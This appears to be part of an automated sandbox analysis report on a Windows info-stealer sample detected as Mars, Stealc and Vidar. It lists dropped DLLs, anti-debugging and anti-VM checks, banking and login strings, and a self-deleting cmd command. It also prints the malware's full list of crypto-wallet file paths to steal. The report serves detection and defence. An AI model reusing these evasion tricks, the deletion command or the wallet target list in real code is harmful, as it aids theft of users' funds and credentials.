Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017FC814 pushfd ; ret	0_2_017FC815
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F8EE5 push ecx; ret	0_2_017F8EF8
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C46B536 push ecx; ret	0_2_6C46B549

Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F7A60 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_017F7A60

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-82231

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-78809

Source: C:\Users\user\Desktop\jlO7971vUz.exe

API coverage: 6.1 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 6136

Thread sleep count: 42 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_017F3560
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017ED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_017ED1F0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017EEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_017EEDE0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017EDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_017EDB90
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017EB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_017EB630
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017E1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_017E1600
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017ED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_017ED570
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_017F31E0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017EE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_017EE450
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_017F2B70
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_017F2630

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017E1120 GetSystemInfo,ExitProcess,

0_2_017E1120

Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: DGCFHIDA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: DGCFHIDA.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: DGCFHIDA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware1
Source: DGCFHIDA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: DGCFHIDA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: DGCFHIDA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: DGCFHIDA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: DGCFHIDA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: DGCFHIDA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DGCFHIDA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: DGCFHIDA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: DGCFHIDA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: DGCFHIDA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: DGCFHIDA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: DGCFHIDA.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: DGCFHIDA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DGCFHIDA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: DGCFHIDA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: DGCFHIDA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: DGCFHIDA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-82218
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-82215
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-82238
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-79826
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-82230
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-82235
Source: C:\Users\user\Desktop\jlO7971vUz.exe	API call chain: ExitProcess graph end node	graph_0-78817

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-78735

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B3BDD0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00B3BDD0

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B32690 LoadLibraryA,GetProcAddress,GetProcAddress,NtUnmapViewOfSection,GetProcAddress,GetCurrentProcess,NtAllocateVirtualMemory,GetCurrentProcess,

0_2_00B32690

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F75D0 mov eax, dword ptr fs:[00000030h]

0_2_017F75D0

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017EF920 strtok_s,GetProcessHeap,HeapAlloc,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,strtok_s,lstrlen,memset,

0_2_017EF920

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3BDD0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B3BDD0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B391C8 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B391C8
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B38EC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B38EC4
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B39355 SetUnhandledExceptionFilter,	0_2_00B39355
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017FB5E7 SetUnhandledExceptionFilter,	0_2_017FB5E7
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F936E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_017F936E
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_017F8BFD
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C46B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C46B66C
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C46B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C46B1F7
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C61AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C61AC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F7510 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_017F7510

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5			Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B38CBC cpuid

0_2_00B38CBC

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: strchr,wcsrchr,strcspn,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,setlocale,GetProcAddress,		0_2_00B3C2F0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_017F5A60

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B390C2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B390C2

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F5720 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_017F5720

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F5900 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_017F5900

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jlO7971vUz.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jlO7971vUz.exe PID: 2380, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
